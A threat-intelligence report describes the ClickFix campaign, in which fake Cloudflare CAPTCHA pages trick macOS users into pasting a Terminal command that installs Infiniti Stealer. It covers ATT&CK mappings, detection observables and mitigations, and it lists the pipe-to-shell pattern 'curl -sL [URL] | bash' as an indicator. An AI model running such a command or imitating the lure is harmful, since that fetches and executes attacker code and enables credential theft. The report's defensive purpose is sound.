'ClickFix' Campaign Tricks macOS Users into Installing Infiniti Stealer via Fake CAPTCHA
macOS Users Targeted by "ClickFix" Social Engineering Campaign Distributing Infiniti Stealer Malware
Related Entities
Organizations
Products & Tech
Other
Full Report
Executive Summary
A deceptive social engineering campaign known as ClickFix is actively targeting macOS users to distribute the Infiniti Stealer malware. The attack leverages a convincing but fake Cloudflare CAPTCHA page that tricks the user into voluntarily executing a malicious command in their own Terminal. This action initiates a multi-stage infection process that results in the deployment of Infiniti Stealer, a potent Python-based malware. The stealer is capable of harvesting a broad range of sensitive information, including browser credentials, secrets from the macOS Keychain, cryptocurrency wallet data, and developer files. The stolen data is then exfiltrated to an attacker-controlled server, with notifications sent via Telegram.
Threat Overview
The ClickFix campaign is a clever social engineering attack that preys on user trust in familiar web security mechanisms like Cloudflare's CAPTCHA. The attack flow is as follows:
- Lure: The user lands on a malicious website that presents a fake Cloudflare "human verification" page.
- The Trick: Instead of a standard CAPTCHA challenge, the page displays a message instructing the user to prove they are human by copying a command, opening the macOS Terminal application, and pasting/executing the command.
- User-Assisted Execution: The user, believing this is a legitimate verification step, executes the malicious Bash script on their own machine, bypassing many traditional security warnings.
- Infection Chain: The Bash script downloads and executes a Nuitka loader. Nuitka is a tool that compiles Python code into a standalone executable, which in this case is used to decompress and launch the final payload.
- Payload Deployment: The final payload, Infiniti Stealer, is executed in memory.
Technical Analysis
This attack is notable for its reliance on manipulating the user into being an active participant in their own compromise.
TTPs and Malware Capabilities:
- Social Engineering (
T1204.002 - Malicious File): While not a file, the attack relies on the user running malicious code from a command they are tricked into trusting. - User Execution (
T1204.001): The entire infection chain is predicated on the user executing the initial command. - Command and Scripting Interpreter (
T1059.004 - Unix Shell): The initial payload is a Bash script. - Infiniti Stealer Capabilities:
- Credential Harvesting (
T1555.003 - Credentials from Web Browsers): Steals cookies, passwords, and credit card information from various web browsers. - Keychain Access (
T1555.001): Attempts to dump the contents of the macOS Keychain, which stores passwords and certificates. - Cryptocurrency Wallet Theft (
T1552.001 - Credentials In Files): Searches for files associated with cryptocurrency wallets. - Screen Capture (
T1113): Takes screenshots of the user's desktop during execution. - Data Exfiltration (
T1041 - Exfiltration Over C2 Channel): Bundles all stolen data and sends it via HTTP POST requests to a C2 server.
- Credential Harvesting (
- C2 Communication: The malware sends a notification to a private Telegram channel upon successful data exfiltration, alerting the operator.
The use of a Nuitka loader is a clever evasion technique. By compiling the Python stealer into a binary, the attackers can obfuscate the source code and make it more difficult for signature-based antivirus tools to detect.
Impact Assessment
A successful Infiniti Stealer infection can lead to a complete compromise of the victim's digital identity. The theft of browser and Keychain passwords can give attackers access to a wide range of online accounts, including email, banking, and social media. The loss of cryptocurrency wallets can result in direct and irreversible financial loss. For developers, the theft of secrets and credentials from their machine can lead to a broader supply chain attack against their employer or projects. The attack is a powerful reminder that macOS is not immune to malware and that sophisticated threats are actively targeting the platform.
Cyber Observables for Detection
| Type | Value | Description | Context | Confidence |
|---|---|---|---|---|
| url_pattern | Pages mimicking Cloudflare CAPTCHA but asking for Terminal commands | The primary lure of the ClickFix campaign. | User education, web proxy logs. | high |
| command_line_pattern | `curl -sL [URL] | bash` | A common pattern used in the initial infection, where a script is downloaded from a URL and piped directly into bash. | EDR with command-line logging, shell history analysis. |
| process_name | Nuitka-Loader.py or similar |
The execution of a Nuitka-compiled binary may be anomalous on many systems. | Process monitoring on endpoints. | medium |
| network_traffic_pattern | Outbound POST request to unknown URL followed by connection to api.telegram.org |
This pattern could indicate data exfiltration followed by the C2 notification. | EDR, network security monitoring. | medium |
Detection & Response
- User Training: The most effective defense is to train users to recognize the social engineering trick. Users should be taught that no legitimate website will ever ask them to run a command in their Terminal to prove they are human.
- EDR Monitoring: An EDR solution on macOS can detect the suspicious chain of events: a browser spawning a Terminal, which then executes a
curl | bashcommand, followed by further network connections and file access. Reference D3FEND techniqueD3-PA - Process Analysis. - Network Filtering: Block access to known malicious domains hosting the fake CAPTCHA pages and the C2 servers used by Infiniti Stealer.
Mitigation
- Principle of Least Privilege: Avoid using an administrator account for daily tasks on macOS. While this attack doesn't strictly require admin rights to steal user data, running as a standard user can limit the malware's ability to access system-wide files or persist.
- Browser Security: Use browsers with strong phishing and malicious website protection. Keep browsers and their extensions updated.
- Password Manager & MFA: Using a password manager reduces the value of stolen browser credentials, and having MFA enabled on all critical accounts is the best defense against their misuse.
- Application Control: For corporate environments, consider using application control software for macOS that can prevent the execution of unauthorized scripts or applications, including those initiated by the user.
Timeline of Events
MITRE ATT&CK Mitigations
The primary defense is training users to recognize that legitimate websites will never require them to execute terminal commands for verification.
In a corporate setting, use application control or execution prevention tools to block the running of unauthorized scripts and binaries.
Deploy a reputable EDR/antimalware solution for macOS that uses behavioral analysis to detect suspicious process chains like `curl | bash`.
D3FEND Defensive Countermeasures
The most effective defense against the ClickFix campaign is robust user education and awareness. This is a form of User Behavior Analysis where the user is the analyst. Security teams must train macOS users on a simple, unbreakable rule: No legitimate website, especially a security check like a CAPTCHA, will ever ask you to copy and paste a command into your Terminal. This action is equivalent to giving a stranger the keys to your house. Training materials should include screenshots of the fake Cloudflare page and explain that this is a social engineering trick to bypass all technical security controls. Empowering users to recognize and report this specific tactic is the most direct way to neutralize the threat, as the entire attack chain depends on the user's cooperation.
For technical detection, Process Analysis via an EDR solution is key. An EDR agent on the macOS endpoint can monitor for the specific, anomalous process chain created by this attack. A detection rule should be created to alert on the following sequence: a web browser process (e.g., Safari, Google Chrome) spawning a Terminal process (Terminal.app), which in turn spawns a shell (bash) that executes curl. This is a highly suspicious chain of events that rarely occurs during legitimate activity. By detecting this behavioral pattern, the EDR can alert security analysts or automatically terminate the process tree, preventing the Infiniti Stealer payload from ever being downloaded and executed. This moves the defense from relying solely on the user to having a technical backstop.
In managed corporate environments, Executable Allowlisting (Application Control) provides a powerful defense. macOS has built-in tools, and third-party solutions are also available, that can be configured to prevent the execution of any unauthorized code. In the context of the ClickFix attack, even though the user initiates the bash script, an application control policy could prevent that script from running if it's not signed by a trusted developer or located in an approved path. This 'default-deny' stance ensures that only vetted and approved software can run, effectively blocking the execution of the Nuitka loader and the Infiniti Stealer payload, regardless of how they arrive on the system. This is a high-maturity control but is extremely effective against user-initiated malware execution.
Sources & References
Article Author
Jason Gomes
• Cybersecurity PractitionerCybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Tags
📢 Share This Article
Help others stay informed about cybersecurity threats